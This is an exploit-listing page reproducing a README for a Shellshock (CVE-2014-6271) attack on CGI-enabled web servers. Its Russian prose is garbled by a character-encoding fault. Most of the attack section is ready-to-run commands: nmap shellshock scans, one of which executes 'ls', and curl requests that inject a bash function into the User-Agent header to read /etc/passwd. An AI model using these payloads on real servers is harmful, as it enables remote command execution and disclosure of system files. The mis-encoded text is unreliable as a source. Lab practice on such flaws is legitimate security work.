Sploitus

Exploit for CVE-2014-6271

kitploit Β· 2026-08-24

Exploit Code

MARKDOWN46 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-J0HNTH3KN1GHT-CVE-2014-6271
![](https://assets.kitploit.com/production/public/readmes/36842/b8a2d0d9338e7fa52d16331cfde66b8efc4010ab27419b146f0b58cb18b812e1.png) ![](https://img.shields.io/badge/Language%20-Python3-blue.svg) ![](https://img.shields.io/badge/CVE%20-Shellshock-cyan.svg) ![](https://img.shields.io/badge/Target%20OS%20-Linux-yellow.svg) ![](https://img.shields.io/badge/Exploit%20-teste?style=flat-square) ![](https://img.shields.io/badge/Type%20-Script-red.svg)

# Эксплуатация уязвимости Shellshock (CVE-2014-6271)

Shellshock β€” это ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ ΡƒΠ΄Π°Π»Ρ‘Π½Π½ΠΎΠ³ΠΎ выполнСния ΠΊΠΎΠΌΠ°Π½Π΄ Π² BASH. Π”Π°Π½Π½Ρ‹ΠΉ скрипт эксплуатируСт ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π² Π²Π΅Π±-срСдС Apache ΠΈΠ»ΠΈ Π°Π½Π°Π»ΠΎΠ³ΠΈΡ‡Π½Ρ‹Ρ… сСрвСров с Π²ΠΊΠ»ΡŽΡ‡Ρ‘Π½Π½Ρ‹ΠΌ mod_cgi. Π£ΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π·Π°ΠΊΠ»ΡŽΡ‡Π°Π΅Ρ‚ΡΡ Π² манипуляции ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹ΠΌΠΈ окруТСния β€” динамичСскими ΠΈΠΌΠ΅Π½ΠΎΠ²Π°Π½Π½Ρ‹ΠΌΠΈ значСниями, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π²Π»ΠΈΡΡŽΡ‚ Π½Π° Π²Ρ‹ΠΏΠΎΠ»Π½Π΅Π½ΠΈΠ΅ процСссов Π½Π° ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π΅. ΠΡ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠ΅ ΠΌΠΎΠ³ΡƒΡ‚ Π²ΠΎΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒΡΡ этим, прикрСпляя врСдоносный ΠΊΠΎΠ΄ ΠΊ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½Ρ‹ΠΌ окруТСния, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ выполняСтся ΠΏΡ€ΠΈ ΠΏΠΎΠ»ΡƒΡ‡Π΅Π½ΠΈΠΈ ΠΏΠ΅Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎΠΉ. Π­Ρ‚ΠΎ позволяСт Π°Ρ‚Π°ΠΊΡƒΡŽΡ‰ΠΈΠΌ ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎ ΡΠΊΠΎΠΌΠΏΡ€ΠΎΠΌΠ΅Ρ‚ΠΈΡ€ΠΎΠ²Π°Ρ‚ΡŒ систСму.

### Лаборатория для тСстирования уязвимости

  * PentesterLab

  * VulnHub

  * TryHackMe

![Π’ΠΈΠ΄Π΅ΠΎ2](https://assets.kitploit.com/production/public/readmes/36842/0664147bf475ec262c7d41ff2c689639b155db64de084051575f6ff4b1e1e573.gif)




# 

#### Поиск страниц CGI-BIN:

root@kitploit:~
    
    
    $ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
    $ nmap -sV -p- --script http-shellshock 192.168.x.x
    $ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
    

#### Ручная ΠΏΡ€ΠΎΠ²Π΅Ρ€ΠΊΠ°:

root@kitploit:~
    
    
    sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
    sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
    

# ΠŸΡ€Π΅Π΄ΡƒΠΏΡ€Π΅ΠΆΠ΄Π΅Π½ΠΈΠ΅:

> Π― Π½Π΅ нСсу отвСтствСнности Π·Π° любоС Π½Π΅Π·Π°ΠΊΠΎΠ½Π½ΠΎΠ΅ использованиС ΠΈΠ»ΠΈ ΡƒΡ‰Π΅Ρ€Π±, ΠΏΡ€ΠΈΡ‡ΠΈΠ½Ρ‘Π½Π½Ρ‹ΠΉ этим инструмСнтом. Он Π±Ρ‹Π» написан Ρ€Π°Π΄ΠΈ развлСчСния, Π° Π½Π΅ Ρ€Π°Π΄ΠΈ Π·Π»Π°, ΠΈ ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½ для ΠΏΠΎΠ²Ρ‹ΡˆΠ΅Π½ΠΈΡ освСдомлённости ΠΎ Ρ…Π°ΠΊΠΈΠ½Π³Π΅ ΠΈ кибСрбСзопасности

_**Π£Π΄Π°Ρ‡Π½ΠΎΠ³ΠΎ хакСрства :)**_